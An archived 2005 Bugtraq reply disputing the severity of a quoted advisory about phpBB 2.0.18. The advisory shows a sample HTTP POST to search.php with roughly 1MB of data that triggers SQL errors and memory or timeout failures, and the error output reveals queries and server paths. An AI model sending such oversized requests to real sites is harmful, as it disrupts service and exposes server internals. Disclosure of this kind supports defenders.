| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 15 Nov 2005 08:42:03 +0100 (CET) From: Ron van Daal <ronvdaal@....nl> To: max@...tsuper.pl Cc: bugtraq@...urityfocus.com Subject: Re: phpBB 2.0.18 SQL Query problem This isn't a security problem. Why post it to Bugtraq? Did you reported this to the PhpBB bugtracker? -- Ron On Fri, 11 Nov 2005 max@...tsuper.pl wrote: > ------------------------------------------------------------------------------ > /usr/local/libexec/ppf_verify: pgp command failed > > gpg: Signature made Wed Oct 12 18:03:04 2005 CEST using DSA key ID 7FDF4CEE > gpg: Can't check signature: public key not found > ------------------------------------------------------------------------------ > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > [phpBB 2.0.18 SQL Query problem cXIb8O3.19] > > Author: Maksymilian Arciemowicz (cXIb8O3) > Date: 11.11.2005 > from securityreason.com TEAM > > - --- 0.Description --- > phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar > d package. phpBB has a user-friendly interface, simple and straightforward administration > panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL > , MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so > lution for all web sites. > Contact with author http://www.phpbb.com/about.php. > > - --- 1. * SQL query problem --- > phpBB2 don't check size of sql query. So we can send any data in all post variables. > Standart Environment: > > post_max_size=8M (standart) > max_allowed_packet < 7M (1M standart in mysql) > > Example Evironment: > memory_limit>8MB > max_execution_time=30 > max_allowed_packet=1M > > I have written simple request where one variable POST to sql query was 1M. > > - ---request--- > POST /2018/phpBB2/search.php HTTP/1.1 > Host: localhost > Content-Type: application/x-www-form-urlencoded > Content-Length: strlen(x) > > mode=results&search_keywords=SecurityReasonComSecurityRea...xMB>max_allowed_packet.(example.1MB.data)...sonCom > - ---/request--- > > so in output: > > - ---output1--- > Could not obtain matched posts list > DEBUG MODE > SQL Error : 1153 Got a packet bigger than 'max_allowed_packet' > SELECT m.post_id FROM phpbb_search_wordlist w, phpbb_search_wordmatch m WHERE w.word_text LIKE 'securityreasoncomsecurityreasoncom...' AND m.word_id = w.word_id AND w.word_common <> 1 AND m.title_match = 0 > Line : 321 > File : search.php > - ---/output1--- > > sql error. > > or when you have: > memory_limit=8MB > or > max_execution_time<30 > display_error=1 > > You can see in output example: > > - ---output2--- > Fatal error: Maximum execution time of 15 seconds exceeded in /www/2018/phpBB2/includes/functions_search.php on line 72 > - ---/output2--- > > - ---output3--- > Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 1746401 bytes) in /www/2018/phpBB2/includes/functions_search.php on line 27 > - ---/output3--- > > > Exploit: > http://securityreason.com/achievement_exploitalert/4 > (simple errors) > > - --- 2. Greets --- > sp3x > > - --- 3.Contact --- > Author: Maksymilian Arciemowicz < cXIb8O3 > > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com > GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg > securityreason.com TEAM > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.2 (FreeBSD) > > iD8DBQFDTTO43Ke13X/fTO4RAuUsAJ9Ry6GqbPsb1wSxvqU37cp87UHpTgCeIwdy > k1NCDNaYsDg1ofLsZFJDMAw= > =dp0t > -----END PGP SIGNATURE----- >
Powered by blists - more mailing lists